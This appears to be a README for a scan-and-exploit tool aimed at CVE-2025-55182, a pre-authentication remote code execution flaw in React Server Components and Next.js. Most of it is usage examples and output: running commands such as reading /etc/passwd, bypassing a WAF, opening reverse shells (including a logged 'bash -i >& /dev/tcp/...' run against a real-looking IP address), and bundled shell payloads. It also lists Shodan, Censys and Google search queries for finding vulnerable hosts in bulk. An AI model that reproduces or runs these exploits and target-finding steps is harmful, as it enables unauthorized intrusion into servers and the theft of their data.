Share
## https://sploitus.com/exploit?id=2D7B9A9F-96BB-5EDF-9B74-ADD300ADF2D4
Next.js/React RSC Scanner & Exploit - RCE
This tool is designed for security researchers and penetration testers to detect and exploit the CVE-2025-55182 vulnerability in Next.js/React RSC applications. It provides multiple scanning modes, exploitation features, and WAF bypass techniques.
## π Vulnerability Details
| Category | Information |
| :--- | :--- |
| **Published** | 2025-12-03 |
| **Base Score** | 10.0 (CRITICAL) |
| **Researcher** | Lachlan Davidson (https://github.com/lachlan2k) |
| **Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| **Description** | A critical Remote Code Execution (RCE) vulnerability in React Server Components. Applications using Reactβs server-side runtime including frameworks like Next.js are affected. The issue is caused by unsafe deserialization of untrusted βFlightβ protocol data, allowing an attacker to achieve pre-authentication code execution on the server. Updating to patched React and framework versions is required. |
| **EPSS Score** | 27.81% (Probability of exploitation) |
| **CISA KEV Catalog** | Listed: Yes, Ransomware: Unknown |
| **HackerOne Hacktivity** | Rank: 1, Reports: 92 |
| **Patching Priority** | A+ |
## π― Affected Versions
This vulnerability affects the following versions of React Server Components:
- **React Server Components**: 19.0.0, 19.1.0, 19.1.1, and 19.2.0
- **Next.js** versions β₯14.3.0-canary.77, all 15.x, and 16.x
- **frameworks using RSC**: React Router (RSC mode), Waku, Redwood SDK, and various RSC plugins
The following packages are also affected:
- `react-server-dom-parcel`
- `react-server-dom-turbopack`
- `react-server-dom-webpack`
## β¨ Features
- π― **Multiple Scanning Modes**: Choose between `rce`, `safe`, and `vercel_bypass` modes.
- π₯ **Easy Exploitation**: Execute commands or get a reverse shell on vulnerable targets.
- π **Custom Payloads**: Provide custom payloads as a string or from a file.
- π‘οΈ **WAF Bypass**: Techniques to bypass Web Application Firewalls.
- β‘ **Fast and Concurrent**: Scans multiple targets using asyncio.
- π **Verbose Output**: Polished and detailed output for easy debugging.
- π¨ **Colored Output**: For better readability.
## π οΈ Installation
```bash
git clone https://github.com/l0n3m4n/CVE-2025-55182.git
cd CVE-2025-55182
# Create a virtual environment
python3 -m venv venv-55182
source venv-55182/bin/activate
# Install dependencies
pip install -r requirements.txt
```
## usage
```bash
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
usage: CVE-2025-55182.py [-h] (-u URL | -f FILE) [-c COMMAND] [-p PAYLOAD] [-r LHOST:LPORT] [-sm MODE] [-wb]
[-wbs KB] [-o FILE] [-t NUM] [-T SEC] [-P URL] [-H HEADER] [-v]
Powerful all-in-one tool (scan and exploit) CVE-2025-55182 in Next.js applications
options:
-h, --help show this help message and exit
-u, --url URL Single URL to scan or exploit.
-f, --file FILE File containing a list of URLs to scan/exploit.
Exploitation Options:
-c, --command COMMAND Command to execute on the target(s).
-p, --payloads PAYLOAD Custom payload to execute on the target(s). Can be a string or a file
path.
-r, --reverse-shell LHOST:LPORT Attempt a reverse shell.
Scanning Options:
-sm, --scan-mode MODE Scanning technique. Choices: {rce, safe, vercel_bypass}. (default: rce)
-wb, --waf-bypass Add junk data to the request to bypass WAFs.
-wbs, --waf-bypass-size KB Size of junk data in KB (default: 128).
General Options:
-o, --output FILE File to save vulnerable URLs from scans.
-t, --threads NUM Number of concurrent threads (default: 10).
-T, --timeout SEC Request timeout in seconds (default: 10).
-P, --proxy URL Proxy to use (e.g., http://127.0.0.1:8080).
-H, --header HEADER Add custom headers (e.g., 'Cookie: session=...').
-v, --verbose Enable verbose output for failed/non-vulnerable checks.
```
## π¬ Scanning Modes
- **`rce` (default)**: Active scan mode, executes an `echo` command to confirm the vulnerability. This is the most reliable method, but it may leave logs on the target system.
- **`safe`**: Side-channel scan mode, does not execute commands. It checks for a specific error message (`E{"digest"`) to determine if the target is vulnerable. This is safer than `rce` mode, but may be less reliable.
- **`vercel_bypass`**: Uses a specific payload to bypass Vercel's WAF and checks for the command output in the `X-Action-Redirect` header.
## π Examples
### Scanning
```bash
# Scan a single URL with the default rce check
python3 CVE-2025-55182.py -u http://target.com
# Scan a list of URLs with the `safe` mode and 20 threads
python3 CVE-2025-55182.py -f urls.txt -sm safe -t 20
# Scan with Vercel WAF bypass mode and save vulnerable URLs to a file
python3 CVE-2025-55182.py -f urls.txt -sm vercel_bypass -o vulnerable.txt
```
### Exploitation
```bash
# Execute a command on a single target
python3 CVE-2025-55182.py -u http://target.com -c "cat /etc/passwd"
# Use WAF bypass techniques
python3 CVE-2025-55182.py -u http://target.com -c "whoami" -wb
# Use a custom payload string
python3 CVE-2025-55182.py -u http://target.com -p "my custom payload"
# Use a custom payload from a file
python3 CVE-2025-55182.py -u http://target.com -p /path/to/payload.txt
# Get a reverse shell
python3 CVE-2025-55182.py -u http://target.com -r 10.10.10.1:4444
# Get a reverse shell using a payload file
python3 CVE-2025-55182.py -u http://target.com -p linux_revshell.sh
```
### π» Scanning a Vulnerable Target
```bash
$ python3 CVE-2025-55182.py -u http://target.com
```
```bash
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\[_____ \ / _____/| |__ ____ | | | |
| _// __ \__ \ _/ ___ __\/ ____/ \_____ \ | | \/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___\| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[+] VULNERABLE: http://target.com (Mode: rce)
```
### Scanning a Non-Vulnerable Target
```bash
$ python3 CVE-2025-55182.py -u http://target.com
```
```bash
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\[_____ \ / _____/| |__ ____ | | | |
| _// __ \__ \ _/ ___ __\/ ____/ \_____ \ | | \/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___\| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[-] NOT VULNERABLE: http://target.com
```
### Scanning with Verbose Output
```bash
$ python3 CVE-2025-55182.py -u http://target.com -v
```
```bash
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\[_____ \ / _____/| |__ ____ | | | |
| _// __ \__ \ _/ ___ __\/ ____/ \_____ \ | | \/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___\| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[-] NOT VULNERABLE: http://target.com
[*] Verbose output for http://target.com:
Status Code: 200
Response Headers:
Server: nginx
Content-Type: text/html
...
Response Body (first 500 chars):
...
```
### Exploiting with a Command
```bash
$ python3 CVE-2025-55182.py -u http://target.com -c "whoami"
```
```bash
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\[_____ \ / _____/| |__ ____ | | | |
| _// __ \__ \ _/ ___ __\/ ____/ \_____ \ | | \/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___\| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[*] Exploiting: http://target.com with command: whoami
[+] COMMAND EXECUTED SUCCESSFULLY
----------------------------------------
nextjs
----------------------------------------
```
### Exploiting with a Reverse Shell
```bash
$ python3 CVE-2025-55182.py -u http://target.com -r 10.10.10.1:4444
```
```bash
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\[_____ \ / _____/| |__ ____ | | | |
| _// __ \__ \ _/ ___ __\/ ____/ \_____ \ | | \/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___\| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[*] Attempting reverse shell to 10.10.10.1:4444 from http://target.com
[*] Using Linux (bash) reverse shell payload.
[*] Please start your listener, e.g., nc -lvnp 4444
[*] Payload sent. Check your listener.
```
```bash
β― python3 CVE-2025-55182.py -u https://34.51.178.220/ -p linux_revshell.sh
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\[_____ \ / _____/| |__ ____ | | | |
| _// __ \__ \ _/ ___ __\/ ____/ \_____ \ | | \/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___\| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[*] Loaded payload from file: linux_revshell.sh
[*] Exploiting: https://target.com/ with command: bash -i >& /dev/tcp/10.21.252.17/5555 0>&1
[+] COMMAND EXECUTED SUCCESSFULLY
----------------------------------------
486939432
----------------------------------------
```
### Network Error
```bash
python3 CVE-2025-55182.py -u http://10.66.158.92:3000 -c "id" -v
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
[*] Exploiting: http://10.66.158.92:3000 with command: id
[-] FAILED TO EXECUTE COMMAND
[*] Verbose output for http://10.66.158.92:3000:
Status Code: -1
Response Headers:
(No headers received)
Response Body (first 200 chars):
An error occurred: HTTPConnectionPool(host='10.66.158.92', port=3000): Max retries exceeded with url: / (Caused by ConnectTimeoutError(, 'Co
```
## π Payloads
The tool comes with pre-made reverse shell payloads for Linux and Windows.
- `linux_revshell.sh`: Bash reverse shell.
- `windows_revshell.ps1`: PowerShell reverse shell.
Before using these files with the `-p` flag, make sure to edit them and set your listener's IP address (`LHOST`) and port (`LPORT`).
### π Further References
- [Facebook Security Advisory](https://www.facebook.com/security/advisories/cve-2025-55182)
- [React Blog: Critical Security Vulnerability in React Server Components](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
## π Finding Vulnerable Systems
#### Shodan
- `http.component:"next.js"`
- `http.favicon.hash:-1766382332` (Vercel favicon)
- `"x-powered-by: Next.js"`
#### Censys
- `((Next.js) and services.software.product=`Next.js`) and services.port=`3000`
- `services.http.response.body: "_next/static"`
#### Google Dorks
- `inurl:"/_next/static"`
- `intitle:"Next.js"`
#### BinaryEdge
- `header:"x-powered-by: Next.js"`
#### Zoomeye
- `app:"Next.js"`
-
## β οΈ Disclaimer
This tool is intended for educational and research purposes only. Do not use it on any system without explicit permission. The author is not responsible for any damage caused by the use of this tool.
## π PR for issue
Details about pull requests related to issues will be listed here.